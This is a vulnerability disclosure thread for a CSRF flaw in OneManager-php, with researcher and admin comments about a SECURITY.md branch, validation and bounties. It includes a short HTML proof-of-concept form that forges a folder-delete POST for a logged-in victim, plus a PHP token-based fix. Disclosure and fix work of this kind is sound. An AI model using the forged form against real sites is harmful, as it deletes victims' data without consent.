Cross-Site Request Forgery (CSRF) in qkqpttgf/onemanager-php

Valid

Reported on

Aug 28th 2021


✍️ Description

An attacker is able to delete any folder via a CSRF attack. The following proof-of-concept page submits the delete request on behalf of a logged-in victim who visits it:

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://lackadaisical-tested-garment.glitch.me/" method="POST">
      <input type="hidden" name="delete&#95;sid" value="1" />
      <input type="hidden" name="delete&#95;fileid" value="" />
      <input type="hidden" name="delete&#95;name" value="fd" />
      <input type="hidden" name="operate&#95;action" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

As you can see, there is no CSRF token in the request.
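As an added example (not OneManager-php's own code, written for PHP 7.4+), here is the same delete operation protected by a per-session synchronizer token and a SameSite session cookie; the function names and the do_delete() placeholder are assumptions made for illustration:

```php
<?php
// Added example, not OneManager-php's own code: a synchronizer-token check
// around the delete operation whose POST fields appear in the PoC above.
// csrf_token(), csrf_valid(), render_delete_form() and the do_delete()
// placeholder are names assumed here for illustration.
// Defence in depth: a SameSite=Lax session cookie is not attached to
// cross-site POSTs, so the forged form in the PoC would arrive unauthenticated.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true, 'secure' => true]);
session_start();

function csrf_token(): string {
    // One random token per session, created on first use.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_valid($submitted): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    // hash_equals() compares in constant time; a missing or non-string
    // token fails closed.
    return is_string($submitted) && $expected !== '' && hash_equals($expected, $submitted);
}

// The legitimate delete form carries the token as a hidden field; a
// cross-origin attacker page cannot read it, so it cannot forge the request.
function render_delete_form(string $sid, string $fileid, string $name): string {
    $h = fn(string $v) => htmlspecialchars($v, ENT_QUOTES, 'UTF-8');
    return '<form method="POST" action="/">'
         . '<input type="hidden" name="csrf_token" value="' . $h(csrf_token()) . '">'
         . '<input type="hidden" name="delete_sid" value="' . $h($sid) . '">'
         . '<input type="hidden" name="delete_fileid" value="' . $h($fileid) . '">'
         . '<input type="hidden" name="delete_name" value="' . $h($name) . '">'
         . '<button name="operate_action" value="Submit">Delete</button></form>';
}

function do_delete(string $sid, string $fileid, string $name): void {
    // Placeholder for the application's real delete logic.
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['operate_action'] ?? '') === 'Submit') {
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);          // reject before any state change
        exit('Invalid or missing CSRF token');
    }
    do_delete((string)($_POST['delete_sid'] ?? ''), (string)($_POST['delete_fileid'] ?? ''),
              (string)($_POST['delete_name'] ?? ''));
}
```

With this in place the PoC form above, which cannot include the session-bound token, is rejected with 403 before the delete runs.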

amammad
3 months ago

Researcher


@admin any feedback from maintainers?

I talked with the maintainer on Telegram and he is waiting for the auth link.

amammad
3 months ago

Researcher


@admin this is a message from the maintainer: "I don't like to leave a log in the master branch, can I create a new branch to do this?"

Jamie Slome
3 months ago

Admin


@amammad - I am not too sure what this means?

amammad
3 months ago

Researcher


@admin ah, so sorry about that, the maintainer already created a SECURITY.md on a huntr.dev branch

https://github.com/qkqpttgf/OneManager-php/tree/huntr.dev

because of personal reasons

Jamie Slome
3 months ago

Admin


No worries, they just need to make sure this is merged into their main branch for us to automatically contact them.

amammad
3 months ago

Researcher


@admin

They don't want to add SECURITY.md to their main branch for personal reasons. Please make an exception for me and the maintainer.

amammad
3 months ago

Researcher


@admin Also, he put his own Telegram ID in the SECURITY.md file, not his own email.

amammad modified their report
2 months ago
qkqpttgf validated this vulnerability 2 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
qkqpttgf confirmed that a fix has been merged on 920501 2 months ago
qkqpttgf has been awarded the fix bounty